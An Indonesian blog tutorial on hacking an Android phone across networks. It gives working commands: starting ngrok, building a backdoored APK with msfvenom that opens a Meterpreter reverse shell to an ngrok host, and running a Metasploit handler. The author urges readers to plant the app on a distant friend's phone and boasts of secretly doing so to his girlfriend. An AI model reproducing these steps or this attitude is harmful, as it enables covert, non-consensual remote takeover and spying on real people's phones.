Hack Android Beda Jaringan Part II terbaru Terbaru 2019

 selamat siang guys,kali ini ane ingin menyebarkan tutorial mengenai cara meremote android jarak jauh. Oke pribadi saja kita siapkan alat dan bahan-bahannya.
  1. install ngrok(portable tinggal pake aja). Klik Disini
  2. daftar akun ngrok Klik disini
  3. install authtokennya yang pada dapat
kalau telah siap seluruh kita akan mulai,langsung saja:
  1. jalankan ngroknya, buka menurut terminal dimana anda mengextrack nya
    Screenshot_20.png
  2. tunggu sampai online
    Screenshot_21.png
    yang saya kotakin merah itu port yang kita pakai nanti buat backdoornya. Terus yang saya kasih rona hijau itu untuk LHOST nya pada backdor (yg rona hijau itu tcp://0.exkjhtl.ngrok.io).
  3. sekarang kita akan untuk backdoornya. Ini command nya msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15838 R>testNgrok.apk
    Screenshot_22.png
  4. selanjutnya kalian cari targetnya,sebaiknya temennya yg jauh. Jikalau ane kmaren buat test pacar ane. Untung orangnya kagak tau hehehe :v  kalian install aplikasi backdoor tdi pada target.
  5. setelah itu kalian buka terminal lagi, service posgresql start
    setelah itu baru msfconsole
  6. setelah metasploit terbuka, kita jalan komen misalnya biasa. use exploit/multi/handler kemudian enter
  7. set payload android/meterpreter/reverse_tcp kemudian enter
  8. set LHOST 0.0.0.0
  9. set LPORT 4444
  10. exploit
  11. tinggal tunggu aja bro
jika kalian masih galau,kalian mampu bertanya ke saya atau kalian mampu liat video ane yg ini

kalau kalian resah hubugi saya di facebook,jikalau ada kesempatan aku akan ajarkan kalian step by stepnya.
sekian tutorial berdasarkan aku ,resiko ditanggung penumpang.
Hack Android Beda Jaringan Part II terbaru Terbaru 2019 selamat siang guys,kali ini ane ingin menyebarkan tutorial mengenai cara meremote android jarak jauh. Oke pribadi saja kita siapkan alat d...

Artikel Terkait

Berikan Komentar

  1. Untuk menulis kode gunakan <i>KODE</i>
  2. Untuk menyisipkan kode ke dalam Syntax Highlighter gunakan <em>KODE YANG LEBIH PANJANG</em>
  3. Kode harus di-parse terlebih dulu agar bisa ditulis.
  4. Centang Notify me untuk mendapatkan notifikasi balasan komentar melalui Email.
histats